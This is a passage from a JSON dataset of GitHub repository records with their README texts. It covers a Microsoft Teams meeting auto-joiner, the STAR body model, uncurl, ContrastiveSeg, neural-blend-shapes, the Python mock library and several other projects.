[Configuration options](#configuration-options)\n- [Run the script](#run-the-script)\n\nPython script to automatically join Microsoft Teams meetings.\nAutomatically turns off your microphone and camera before joining. Automatic login and blacklist can be set in the config file.\n\nAlways joins the newest meeting and leaves either after a specified time, if you are the last person in the meeting or only if a new one is available (see [Configuration options](#configuration-options) for more information).\nI also made a short tutorial video on how to setup the bot: https://youtu.be/YgkSOqfIjf4\n\n![Demo](https://imgur.com/VQOJl8w.gif)\n\n## Prerequisites \n \n - Python3 ([Download](https://www.python.org/downloads/)) \n \n## Configuration options \n \n- **email/password:** \nThe email/password of your Microsoft account. In case you don't want to store your credentials on disk, you can leave any of them empty and you will be prompted to enter them. If you leave them empty in the prompt too, you will have to enter them in the browser. \n\n- **run_at_time:** \nTime to start the script at. Input is a string of the hour and minute in 24h format, if you want it to start immediately leave this empty. \nIf a time before the current time is given, the next day is used. Also make sure that you entered your email and password.\nFor example, if you want the script to start searching meetings at 6 in the morning on the next day, you would input `06:00` in the config.\n\n- **meeting_mode:**\nChange which meetings should be joined. Modes 1, 2 and 3 are available. \n`1` Both channel and calendar meetings \n`2` Only channel meetings \n`3` Only calendar meetings \n\n- **organisation_num:**\nIf your Teams account is in multiple organisations, as seen in the example below, change the organisation_num to the number of the list item (counting starts from 0), \nset to -1 to never change organisation. \n\n \n\n- **random_delay:**\nAdds a random delay (random integer between the two parameters, in seconds) before joining a meeting. Can be useful so the bot seems more \"human like\" or to avoid being one of the first few people to join a meeting. For a fixed delay, set both parameters to the same Integer. \neg: [30,30] will add a fixed delay of 30s before joining the meet.\n\n- **check_interval:**\nThe amount of seconds to wait before checking for meetings again. Only integer numbers greater than 1 are allowed.\n\n- **join_message:**\nA chat message sent when a meeting is joined.\n\n- **auto_leave_after_min:**\nIf set to a value greater than zero, the bot leaves every meeting after the specified time (in minutes). Useful if you know the length of your meeting, if this is left a the default the bot will stay in the meeting until a new one is available.\n\n- **leave_if_last:**\nIf true, leaves the meeting if you are the last person in it.\n\n- **leave_threshold_number:**\nSets the threshold for people to leave the meeting before the bot leaves the meeting. \nFor example: \nPeak members of meeting: 20 \nCurrent members of meeting: 5 \nLeave threshold set to 15 \nBecause 15 people have left the meeting, the bot leaves. \n(Must enable leave_if_last for this to work) \n\n- **leave_threshold_percentage:**\nSets the threshold percentage of people still in the meeting before auto leaving. The same as \nleave_threshold_number but with percentage of the current members to the peak. \n(Must enable leave_if_last for this to work)\n\n- **pause_search:**\nIf true, doesn't search for new meetings while there is one active. Keep in mind to set auto_leave_after_min or leave_if_last,\notherwise the bot will not search for meetings again.\n\n- **headless:**\nIf true, runs Chrome in headless mode (does not open GUI window and runs in background).\n\n- **mute_audio:**\nIf true, mutes all sound output of the browser. This doesn't effect your microphone.\n\n- **chrome_type:**\nValid options: `google-chrome`, `chromium`, `msedge`. By default, google chrome is used, but the script can also be used with Chromium or Microsoft Edge.\n\n- **blacklist:**\nA list of Teams and their channels to ignore. Meetings ocurring in these channels will not be joined.\nIf you have a Team called \"Test1\" and, within that, two channels called \"General\" and \"Channel1\" and you don't want to join meetings in the \"General\" Channel: \n ```json\n \"blacklist\": [\n {\n \"team_name\": \"Test1\",\n \"channel_names\": [\n \"General\"\n ]\n }\n ]\n ```\n If you want to blacklist all the channels in a team, leave the square brackets empty: `\"channel_names\": []`.\n\n- **blacklist_meeting_re:**\nIf calendar meeting title matches a regular expression, it goes to blacklist.\nLeave empty to attend to all calendar meetings. \n\n- **discord_webhook_url:**\nFor getting Discord notifications you have to specify a [Discord webhook url](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks). \n\n ```json \n \"discord_webhook_url\" : \"your_discord_channel_webHook_url\" \n ```\n\n## Run the script\n\n 1. Rename the [config.json.example](config.json.example) file to \"config.json\"\n 2. Edit the \"config.json\" file to fit your preferences (optional)\n 3. Install dependencies: ```pip install -r requirements.txt```\n 4. Run [auto_joiner.py](auto_joiner.py): `python auto_joiner.py`\n 5. After starting, teams might be in Grid view, if this is the case change the view to list [(How to do)](https://support.microsoft.com/en-us/office/view-and-organize-your-teams-b9dd0d8c-243a-43a4-9501-ec8017fec32e)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ahmedosman/STAR", "link": "https://github.com/ahmedosman/STAR", "tags": ["smpl", "smplx", "human", "body", "pose-estimation", "graphics-3d", "eccv2020", "3d-models", "graphics"], "stars": 515, "description": "ECCV2020 - Official code repository for the paper : STAR - A Sparse Trained Articulated Human Body Regressor", "lang": "Python", "repo_lang": "", "readme": "## STAR: Sparse Trained Articulated Human Body Regressor \n\n\n\n\n[[Project Page](https://star.is.tue.mpg.de/)] \n[[Paper](https://ps.is.tuebingen.mpg.de/uploads_file/attachment/attachment/618/star_paper.pdf)]\n[[Supp. Mat.](https://ps.is.tuebingen.mpg.de/uploads_file/attachment/attachment/619/star_supmat.pdf)]\n\n

\n \n

\n\n\n## Table of Contents\n * [License](#license)\n * [Description](#description)\n * [Content](#content)\n * [Installation and Usage](#Installation)\n * [SMPL Comparison](#SMPLComparison)\n * [Citation](#citation)\n * [Acknowledgments](#acknowledgments)\n * [Contact](#contact)\n\n\n## License\n\nSoftware Copyright License for non-commercial scientific research purposes.\nPlease read carefully the [LICENSE file](https://github.com/ahmedosman/STAR/blob/master/LICENSE) and any accompanying\ndocumentation before you download and/or use the STAR model and\nsoftware, (the \"Data & Software\"). By downloading and/or using the\nData & Software (including downloading, cloning, installing, and any other use\nof the corresponding github repository), you acknowledge that you have read\nthese [terms and conditions](https://github.com/ahmedosman/STAR/blob/master/LICENSE) in the LICENSE file, understand them, and agree to be bound by them. If\nyou do not agree with these [terms and conditions](https://github.com/ahmedosman/STAR/blob/master/LICENSE), you must not download and/or\nuse the Data & Software. Any infringement of the terms of this agreement will\nautomatically terminate your rights under this [License](https://github.com/ahmedosman/STAR/blob/master/LICENSE)\n\n\n## Description\n\nSTAR - A **S**parse **T**rained **A**rticulated Human Body **R**egressor is a generateive 3D human body model, that is designed to be a drop-in replacement for the widely used SMPL model.\nSTAR is trained on a large dataset of 14,000 human subjects, with a learned set of sparse and spatially local pose corrective \nblend shapes. In the Figure below, a single joint movement only influences a sparse set of the model vertices. The mesh vertices in \ngray are not affected by the joint movement. In contrast, for SMPL, bending the left elbow causes a bulge in the right elbow.
\nSTAR is publicly avaiable with the full 300 principal-component shape space for research purposes from our website https://star.is.tue.mpg.de/\n\n

\n \n

\n\n\n For more details, please see our ECCV paper\n[STAR: Sparse Trained Articulated Human Body Regressor](https://ps.is.mpg.de/uploads_file/attachment/attachment/618/star_paper.pdf).\n\n## Content\nThis repository contains the model loader for the following auto-differention frameworks:\n* PyTorch. \n* Tensorflow 2.0.\n* Chumpy.\n\nCode tested on Python 3.69, CUDA 10.1, CuDNN 7.6.5 and PyTorch 1.6.0, Tensorflow 2.3, Chumpy 0.69 on Ubuntu 18.04\n\n## Installation \n\n### Install \n\nWe recommend doing the following in a python3 virtual environment.\n\n1. Clone the repository: \n\n```Shell\ngit clone git@github.com:ahmedosman/STAR.git\n```\n2. Install your favorite framework
\nChumpy\n```\npip install chumpy==0.69\npip install opencv-python\n```\n\nPyTorch\n```\npip install pytorch==1.6\n```\n\nTensorflow\n```\npip install tensorflow-gpu==2.3\n```\n5. Download the models from our website https://star.is.tue.mpg.de/\n\n6. Update the model paths in the config.py file.\n```python\npath_male_star = '/mypath/male/model.npz'\npath_female_star = '/mypath/female/model.npz'\npath_neutral_star = '/mypath/neutral/model.npz'\n```\n\n7. Install with pip\n```\npip install .\n```\n\n### Usage\n\nUnder demos/* there are scripts demonstrating how to load and use the model in all frameworks. \n```bash\n $PATH_TO_REPO/\n \u251c\u2500\u2500 demos\n \u2502 \u2502\n \u2502 \u251c\u2500\u2500 compare_frameworks.py #Unit test script constructing the model with three frameworks and comparing the output\n \u2502 \u2514\u2500\u2500 load_chumpy.py #A script demonstrating loading the model in chumpy\n \u2502 \u2514\u2500\u2500 load_tf.py #A script demonstrating loading the model in Tensorflow\n \u2502 \u2514\u2500\u2500 load_torch.py #A script demonstrating loading the model in PyTorch\n \u2502 \u2514\u2500\u2500 profile_tf.py #A script profiling the STAR graph as a function of batch Size in Tensorflow\n | \u2514\u2500\u2500 profile_torch.py #A script profiling the STAR graph as a function of batch Size in PyTorch\n```\n\n## SMPL Comparison \nSTAR is designed to be a drop in replacement for SMPL, similar to SMPL it is parameterised with pose and shape parameters, with the same template\nresolution and kinematic tree. \n\n

\n \n

\n\n### STAR Kinematic Tree\n

\n \n

\n\n\n\n\n## Citation\n\nIf you find this Model & Software useful in your research we would kindly ask you to cite:\n\n```bibtex\n author = {Osman, Ahmed A A and Bolkart, Timo and Black, Michael J.},\n title = {{STAR}: A Sparse Trained Articulated Human Body Regressor},\n booktitle = {European Conference on Computer Vision (ECCV)},\n pages = {598--613},\n year = {2020},\n url = {https://star.is.tue.mpg.de}\n} \n```\n\n## Acknowledgments\nWe thank Naureen M. Mahmood, Talha Zaman, Nikos Athanasiou, Joachim Tesch, Muhammed Kocabas, Nikos Kolotouros and Vassilis Choutas for the discussions \nand Sai Kumar Dwivedi, Lea Muller, Amir Ahmad and Nitin Saini for proof reading the script and\nMason Landry for the video voice over and Benjamin Pellkofer for the IT support.\n\n## Contact\n\nFor questions, please contact [star@tue.mpg.de](mailto:star@tue.mpg.de). \n\nFor commercial licensing (and all related questions for business applications), please contact [ps-license@tue.mpg.de](mailto:ps-license@tue.mpg.de).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "spulec/uncurl", "link": "https://github.com/spulec/uncurl", "tags": [], "stars": 515, "description": "A library to convert curl requests to python-requests.", "lang": "Python", "repo_lang": "", "readme": "# Uncurl - Converting curl requests to python-requests\n\n[![Build Status](https://travis-ci.org/spulec/uncurl.png?branch=master)](https://travis-ci.org/spulec/uncurl)\n\n# In a nutshell\n\nUncurl is a library that allows you to convert curl requests into python code that uses [Requests](github.com/kennethreitz/requests). Since the Chrome network inspector has a nifty \"Copy as cURL\", this tool is useful for recreating browser requests in python.\n\nWhen you don't pass any arguments to uncurl, it will use whatever is in your clipboard as the curl command.\n\n\n## Example\n\n```bash\n$ uncurl \"curl 'https://pypi.python.org/pypi/uncurl' -H 'Accept-Encoding: gzip,deflate,sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Cookie: foo=bar;' -H 'Connection: keep-alive' --compressed\"\nrequests.get(\"https://pypi.python.org/pypi/uncurl\", headers={\n \"Accept-Encoding\": \"gzip,deflate,sdch\",\n \"Accept-Language\": \"en-US,en;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Cache-Control\": \"max-age=0\",\n \"Connection\": \"keep-alive\",\n}, cookies={\n \"foo\": \"bar\",\n})\n```\n\nThe underlying API:\n\n```python\nimport uncurl\n\nprint(uncurl.parse(\"curl 'https://pypi.python.org/pypi/uncurl' -H 'Accept-Encoding: gzip,deflate,sdch'\"))\n```\n\nprints the string\n\n```bash\n'requests.get(\"https://pypi.python.org/pypi/uncurl\", headers={\n \"Accept-Encoding\": \"gzip,deflate,sdch\",\n})'\n```\n\nYou can also retrieve the components as python objects:\n\n```python\n>>> import uncurl\n>>> context = uncurl.parse_context(\"curl 'https://pypi.python.org/pypi/uncurl' -H 'Accept-Encoding: gzip,deflate,sdch'\")\n>>> context.url\nhttps://pypi.python.org/pypi/uncurl\n>>> context.headers\nOrderedDict([('Accept-Encoding', 'gzip,deflate,sdch')])\n```\nOn Mac OS, you can also pipe input to uncurl:\n\n```bash\npbpaste | uncurl\n```\n\n## Install\n\n```console\n$ pip install uncurl\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "confucianzuoyuan/bookstore", "link": "https://github.com/confucianzuoyuan/bookstore", "tags": [], "stars": 515, "description": "\u4f7f\u7528Django\u7f16\u5199\u4e00\u4e2a\u4e66\u57ce\u7535\u5546\u7f51\u7ad9\uff0c\u914d\u5408\u8be6\u7ec6\u7684\u6559\u7a0b\u3002", "lang": "Python", "repo_lang": "", "readme": "#bookstore\nUse Django to write a bookstore e-commerce website, with detailed tutorials.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tfzhou/ContrastiveSeg", "link": "https://github.com/tfzhou/ContrastiveSeg", "tags": ["semantic-segmentation", "contrastive-learning", "pixel-contrast", "hard-example-mining", "cityscapes", "pascal-context"], "stars": 515, "description": "ICCV2021 (Oral) - Exploring Cross-Image Pixel Contrast for Semantic Segmentation", "lang": "Python", "repo_lang": "", "readme": "# Exploring Cross-Image Pixel Contrast for Semantic Segmentation\n\n![](figures/framework.png)\n\n> [**Exploring Cross-Image Pixel Contrast for Semantic Segmentation**](https://arxiv.org/abs/2101.11939), \n> [Wenguan Wang](https://sites.google.com/view/wenguanwang/), [Tianfei Zhou](https://www.tfzhou.com/), [Fisher Yu](https://www.yf.io/), [Jifeng Dai](https://jifengdai.org/), [Ender Konukoglu](https://scholar.google.com/citations?user=OeEMrhQAAAAJ&hl=en) and [Luc Van Gool](https://scholar.google.com/citations?user=TwMib_QAAAAJ&hl=en)
\n> *ICCV 2021 (Oral) ([arXiv 2101.11939](https://arxiv.org/abs/2101.11939))*\n\n## News\n\n* [2022-10-13] Our work [GMMSeg: Gaussian Mixture based Generative Semantic Segmentation Models](https://github.com/leonnnop/GMMSeg) has been accepted to NeurIPS'22.\n* [2022-03-20] Our work [Rethinking Semantic Segmentation: A Prototype View](https://github.com/tfzhou/ProtoSeg) has been accepted to CVPR'22 as an **Oral paper**. \n* [2021-07-28] ContrastiveSeg has been accepted in ICCV'21 as Oral.\n* [2021-07-28] Update memory code.\n* [2021-07-01] The codebase has been transferred from Pytorch-0.4.1 to Pytorch-1.7.1, which will be easier for usage.\n\n## Abstract\n\nCurrent semantic segmentation methods focus only on\nmining \u201clocal\u201d context, i.e., dependencies between pixels\nwithin individual images, by context-aggregation modules\n(e.g., dilated convolution, neural attention) or structureaware optimization criteria (e.g., IoU-like loss). However, they ignore \u201cglobal\u201d context of the training data, i.e.,\nrich semantic relations between pixels across different images. Inspired by the recent advance in unsupervised contrastive representation learning, we propose a pixel-wise\ncontrastive framework for semantic segmentation in the\nfully supervised setting. The core idea is to enforce pixel\nembeddings belonging to a same semantic class to be more\nsimilar than embeddings from different classes. It raises a\npixel-wise metric learning paradigm for semantic segmentation, by explicitly exploring the structures of labeled pixels, which are long ignored in the field. Our method can be\neffortlessly incorporated into existing segmentation frameworks without extra overhead during testing.\n\nWe experimentally show that, with famous segmentation models (i.e.,\nDeepLabV3, HRNet, OCR) and backbones (i.e., ResNet, HRNet), our method brings consistent performance improvements across diverse datasets (i.e., Cityscapes, PASCALContext, COCO-Stuff).\n\n## Installation\n\nThis implementation is built on [openseg.pytorch](https://github.com/openseg-group/openseg.pytorch). Many thanks to the authors for the efforts.\n\nPlease follow the [Getting Started](https://github.com/openseg-group/openseg.pytorch/blob/master/GETTING_STARTED.md) for installation and dataset preparation.\n\n## Performance\n\n### Cityscapes Dataset\n\n| Backbone | Model | Train Set | Val Set | Iterations | Batch Size | Contrast Loss | Memory | mIoU | Log | CKPT |Script |\n| --------- | ---------- | --------- | ------- | ---------- | ---------- | ------------- | ------ | ----- | --- | ---- | ---- |\n| ResNet-101| DeepLab-V3 |train | val | 40000 | 8 | N | N | 72.75 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_deepbase_resnet101_dilated8_deeplab_v3.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_deepbase_resnet101_dilated8_deeplab_v3_max_performance.pth) |```scripts/cityscapes/deeplab/run_r_101_d_8_deeplabv3_train.sh```|\n| ResNet-101| DeepLab-V3 |train | val | 40000 | 8 | Y | N | 77.67 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_contrast_deepbase_resnet101_dilated8_deeplab_v3_contrast.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/deeplab_v3_contrast_deepbase_resnet101_dilated8_deeplab_v3_contrast_max_performance.pth) |```scripts/cityscapes/deeplab/run_r_101_d_8_deeplabv3_contrast_train.sh```|\n| HRNet-W48 | HRNet-W48 |train | val | 40000 | 8 | N | N | 79.27 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_lr1x_hrnet_ce.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_lr1x_hrnet_ce_max_performance.pth) |```scripts/cityscapes/hrnet/run_h_48_d_4.sh```|\n| HRNet-W48 | HRNet-W48 |train | val | 40000 | 8 | Y | N | 80.18 | [log](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_contrast_lr1x_hrnet_contrast_t0.1.log) | [ckpt](https://github.com/tfzhou/pretrained_weights/releases/download/v0.1/hrnet_w48_contrast_lr1x_hrnet_contrast_t0.1_max_performance.pth) |```scripts/cityscapes/hrnet/run_h_48_d_4_contrast.sh```|\n\n_It seems that the DeepLab-V3 baseline does not produce the expected performance on the new codebase. I will tune this later._\n\n\n### Study of the temperature\n| Backbone | Train Set | Val Set | Iterations | Batch Size | Temperature | mIoU |\n| --------- | --------- | ------- | ---------- | ---------- | ------------- | ----- |\n| HRNet-W48 | train | val | 40000 | 8 | 0.05 | 79.80 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.07 | 79.59 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.10 | **80.18** |\n| HRNet-W48 | train | val | 40000 | 8 | 0.20 | 80.01 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.30 | 79.27 |\n| HRNet-W48 | train | val | 40000 | 8 | 0.40 | 79.40 |\n\n\n## t-SNE Visualization\n\n* Pixel-wise Cross-Entropy Loss\n

\n \n

\n\n* Pixel-wise Contrastive Learning Objective \n \n

\n \n

\n\n## Citation\n```\n@inproceedings{Wang_2021_ICCV,\n author = {Wang, Wenguan and Zhou, Tianfei and Yu, Fisher and Dai, Jifeng and Konukoglu, Ender and Van Gool, Luc},\n title = {Exploring Cross-Image Pixel Contrast for Semantic Segmentation},\n booktitle = {Proceedings of the IEEE/CVF International Conference on Computer Vision (ICCV)},\n year = {2021},\n pages = {7303-7313}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SensorsIot/SuperPower", "link": "https://github.com/SensorsIot/SuperPower", "tags": [], "stars": 515, "description": "Here you should find the best power supplies for your low-power projects", "lang": "Python", "repo_lang": "", "readme": "# SuperPower\nHere you should find the best power supplies for your low-power projects. Because of different requirements for an Raspberry Pi and micro-controllers like the ESP32 we split the project into two boards, one for the Raspberry Pi (SuperPower-Rpi) and one for micro-controllers (SuperPower-uC) with low power.\n\n##### [SuperPower-Rpi](/SuperPower-RPi/) for Raspberry Pi\n\n##### [SuperPower-uC](/SuperPower-uC/) for micro-controllers and low-power devices\n\n## Licence\n\nAll hardware designs and products you can find in this repository is licensed under [CERN Open Hardware Licence Version 2 - Weakly Reciprocal](/LICENCE.txt)\n\n## Relevant links\n\n[Discord Channel](https://discord.gg/dCr86Hk) \n\n[Google Drive Project Files](https://drive.google.com/drive/folders/1lCirijHUkISdUYBIRblkILHM6fstifWS)\n\n[![Video](http://img.youtube.com/vi/-SJbdPvgQnE/0.jpg)](https://www.youtube.com/watch?v=-SJbdPvgQnE \"Video\")\n\n[GitHub Project](https://github.com/SensorsIot/SuperPower)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PeizhuoLi/neural-blend-shapes", "link": "https://github.com/PeizhuoLi/neural-blend-shapes", "tags": ["computer-graphics", "computer-animation", "deep-learning", "character-animation", "rigging-framework"], "stars": 515, "description": "An end-to-end library for automatic character rigging, skinning, and blend shapes generation, as well as a visualization tool [SIGGRAPH 2021]", "lang": "Python", "repo_lang": "", "readme": "# Learning Skeletal Articulations with Neural Blend Shapes\n\n![Python](https://img.shields.io/badge/Python->=3.8-Blue?logo=python) ![Pytorch](https://img.shields.io/badge/PyTorch->=1.8.0-Red?logo=pytorch)\n![Blender](https://img.shields.io/badge/Blender-%3E=2.8-Orange?logo=blender)\n\nThis repository provides an end-to-end library for automatic character rigging, skinning, and blend shapes generation, as well as a visualization tool. It is based on our work [Learning Skeletal Articulations with Neural Blend Shapes](https://peizhuoli.github.io/neural-blend-shapes/index.html) that is published in SIGGRAPH 2021.\n\n\n\n## Prerequisites\n\nOur code has been tested on Ubuntu 18.04. Before starting, please configure your Anaconda environment by\n\n~~~bash\nconda env create -f environment.yaml\nconda activate neural-blend-shapes\n~~~\n\nOr you may install the following packages (and their dependencies) manually:\n\n- pytorch 1.8\n- tensorboard\n- tqdm\n- chumpy\n\nNote the provided environment only includes the PyTorch CPU version for compatibility consideration.\n\n## Quick Start\n\nWe provide a pretrained model that is dedicated for biped characters. Download and extract the pretrained model from [Google Drive](https://drive.google.com/file/d/1S_JQY2N4qx1V6micWiIiNkHercs557rG/view?usp=sharing) or [Baidu Disk](https://pan.baidu.com/s/1y8iBqf1QfxcPWO0AWd2aVw) (9ras) and put the `pre_trained` folder under the project directory. Run\n\n~~~bash\npython demo.py --pose_file=./eval_constant/sequences/greeting.npy --obj_path=./eval_constant/meshes/maynard.obj\n~~~\n\nThe nice greeting animation showed above will be saved in `demo/obj` as obj files. In addition, the generated skeleton will be saved as `demo/skeleton.bvh` and the skinning weight matrix will be saved as `demo/weight.npy`. If you need the bvh file animated, you may specify `--animated_bvh=1`.\n\nIf you are interested in traditional linear blend skinning (LBS) technique result generated with our rig, you can specify `--envelope_only=1` to evaluate our model only with the envelope branch.\n\nWe also provide other several meshes and animation sequences. Feel free to try their combinations!\n\n\n### FBX Output (New!)\n\nNow you can choose to output the animation as a single fbx file instead of a sequence of obj files! Simply do following:\n\n~~~bash\npython demo.py --animated_bvh=1 --obj_output=0\ncd blender_scripts\nblender -b -P nbs_fbx_output.py -- --input ../demo --output ../demo/output.fbx\n~~~\n\nNote that you need to install Blender (>=2.80) to generate the fbx file. You may explore more options on the generated fbx file in the source code.\n\nThis code is contributed by [@huh8686](https://github.com/huh8686).\n\n### Test on Customized Meshes\n\nYou may try to run our model with your own meshes by pointing the `--obj_path` argument to the input mesh. Please make sure your mesh is triangulated and has a consistent upright and front facing orientation. Since our model requires the input meshes are spatially aligned, please specify `--normalize=1`. Alternatively, you can try to scale and translate your mesh to align the provided `eval_constant/meshes/smpl_std.obj` without specifying `--normalize=1`.\n\n### Evaluation\n\nTo reconstruct the quantitative result with the pretrained model, you need to download the test dataset from [Google Drive](https://drive.google.com/file/d/1RwdnnFYT30L8CkUb1E36uQwLNZd1EmvP/view?usp=sharing) or [Baidu Disk](https://pan.baidu.com/s/1c5QCQE3RXzqZo6PeYjhtqQ) (8b0f) and put the two extracted folders under `./dataset` and run\n\n~~~bash\npython evaluation.py\n~~~\n\n\n## Train from Scratch\n\nWe provide instructions for retraining our model.\n\nNote that you may need to reinstall the PyTorch CUDA version since the provided environment only includes the PyTorch CPU version.\n\nTo train the model from scratch, you need to download the training set from [Google Drive](https://drive.google.com/file/d/1RSd6cPYRuzt8RYWcCVL0FFFsL42OeHA7/view?usp=sharing) or [Baidu Disk](https://pan.baidu.com/s/1J-hIVyz19hKZdwKPfS3TtQ) (uqub) and put the extracted folders under `./dataset`.\n\nThe training process contains tow stages, each stage corresponding to one branch. To train the first stage, please run\n\n~~~bash\npython train.py --envelope=1 --save_path=[path to save the model] --device=[cpu/cuda:0/cuda:1/...]\n~~~\n\nFor the second stage, it is strongly recommended to use a pre-process to extract the blend shapes basis then start the training for much better efficiency by\n\n~~~bash\npython preprocess_bs.py --save_path=[same path as the first stage] --device=[computing device]\npython train.py --residual=1 --save_path=[same path as the first stage] --device=[computing device] --lr=1e-4\n~~~\n\n## Blender Visualization\n\nWe provide a simple wrapper of blender's python API (>=2.80) for rendering 3D mesh animations and visualize skinning weight. The following code has been tested on Ubuntu 18.04 and macOS Big Sur with Blender 2.92.\n\nNote that due to the limitation of Blender, you cannot run Eevee render engine with a headless machine. \n\nWe also provide several arguments to control the behavior of the scripts. Please refer to the code for more details. To pass arguments to python script in blender, please do following:\n\n~~~bash\nblender [blend file path (optional)] -P [python script path] [-b (running at backstage, optional)] -- --arg1 [ARG1] --arg2 [ARG2]\n~~~\n\n\n\n### Animation\n\nWe provide a simple light and camera setting in `eval_constant/simple_scene.blend`. You may need to adjust it before using. We use `ffmpeg` to convert images into video. Please make sure you have installed it before running. To render the obj files generated above, run\n\n~~~bash\ncd blender_script\nblender ../eval_constant/simple_scene.blend -P render_mesh.py -b\n~~~\n\nThe rendered per-frame image will be saved in `demo/images` and composited video will be saved as `demo/video.mov`. \n\n### Skinning Weight\n\nVisualizing the skinning weight is a good sanity check to see whether the model works as expected. We provide a script using Blender's built-in ShaderNodeVertexColor to visualize the skinning weight. Simply run\n\n~~~bash\ncd blender_script\nblender -P vertex_color.py\n~~~\n\nYou will see something similar to this if the model works as expected:\n\n\n\nMeanwhile, you can import the generated skeleton (in `demo/skeleton.bvh`) to Blender. For skeleton rendering, please refer to [deep-motion-editing](https://github.com/DeepMotionEditing/deep-motion-editing).\n\n## Acknowledgements\n\nThe code in `blender_scripts/nbs_fbx_output.py` is contributed by [@huh8686](https://github.com/huh8686).\n\nThe code in `meshcnn` is adapted from [MeshCNN](https://github.com/ranahanocka/MeshCNN) by [@ranahanocka](https://github.com/ranahanocka/).\n\nThe code in `models/skeleton.py` is adapted from [deep-motion-editing](https://github.com/DeepMotionEditing/deep-motion-editing) by [@kfiraberman](https://github.com/kfiraberman), [@PeizhuoLi](https://github.com/PeizhuoLi) and [@HalfSummer11](https://github.com/HalfSummer11).\n\nThe code in `dataset/smpl.py` is adapted from [SMPL](https://github.com/CalciferZh/SMPL) by [@CalciferZh](https://github.com/CalciferZh).\n\nPart of the test models are taken from [SMPL](https://smpl.is.tue.mpg.de/en), [MultiGarmentNetwork](https://github.com/bharat-b7/MultiGarmentNetwork) and [Adobe Mixamo](https://www.mixamo.com).\n\n## Citation\n\nIf you use this code for your research, please cite our paper:\n\n~~~bibtex\n@article{li2021learning,\n author = {Li, Peizhuo and Aberman, Kfir and Hanocka, Rana and Liu, Libin and Sorkine-Hornung, Olga and Chen, Baoquan},\n title = {Learning Skeletal Articulations with Neural Blend Shapes},\n journal = {ACM Transactions on Graphics (TOG)},\n volume = {40},\n number = {4},\n pages = {130},\n year = {2021},\n publisher = {ACM}\n}\n~~~\n\n", "readme_type": "markdown", "hn_comments": "(haven't read the article/paper yet but...)\nI wonder how this works compared to the games industry standard using inverse kinematics?edit: looks like this paper is dedicated to the motion capture side of animations, rather than comparing/blending with procedural generation techniques.So here the idea is to predict which points will be more affected by a deformation, given a 3D mesh model and the corresponding skeleton, right?The output is probably something similar to a normal map. Can the deformation be handled efficiently on the GPU using a geometry shader?Hopefully in a few years we won't have aberrations like parts of a body colliding with another. This is also a frequent issue with boats in game.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "testing-cabal/mock", "link": "https://github.com/testing-cabal/mock", "tags": [], "stars": 515, "description": "The Python mock library", "lang": "Python", "repo_lang": "", "readme": "mock is a library for testing in Python. It allows you to replace parts of\nyour system under test with mock objects and make assertions about how they\nhave been used.\n\nmock is now part of the Python standard library, available as `unittest.mock\n`_ in Python 3.3\nonwards.\n\nThis package contains a rolling backport of the standard library mock code\ncompatible with Python 3.6 and up.\n\nPlease see the standard library documentation for more details.\n\n:Homepage: `Mock Homepage`_\n:Download: `Mock on PyPI`_\n:Documentation: `Python Docs`_\n:License: `BSD License`_\n:Support: `Mailing list (testing-in-python@lists.idyll.org)\n `_\n:Code: `GitHub\n `_\n:Issue tracker: `GitHub Issues\n `_\n:Build status:\n |CircleCI|_ |Docs|_\n\n .. |CircleCI| image:: https://circleci.com/gh/testing-cabal/mock/tree/master.svg?style=shield\n .. _CircleCI: https://circleci.com/gh/testing-cabal/mock/tree/master\n\n .. |Docs| image:: https://readthedocs.org/projects/mock/badge/?version=latest\n .. _Docs: http://mock.readthedocs.org/en/latest/\n\n.. _Mock Homepage: http://mock.readthedocs.org/en/latest/\n.. _BSD License: https://github.com/testing-cabal/mock/blob/master/LICENSE.txt\n.. _Python Docs: https://docs.python.org/dev/library/unittest.mock.html\n.. _mock on PyPI: https://pypi.org/project/mock/\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clvrai/SSGAN-Tensorflow", "link": "https://github.com/clvrai/SSGAN-Tensorflow", "tags": ["ssgan", "semi-supervised-learning", "gan", "generative-adversarial-network"], "stars": 515, "description": "A Tensorflow implementation of Semi-supervised Learning Generative Adversarial Networks (NIPS 2016: Improved Techniques for Training GANs).", "lang": "Python", "repo_lang": "", "readme": "# Semi-supervised learning GAN in Tensorflow\n\nAs part of the implementation series of 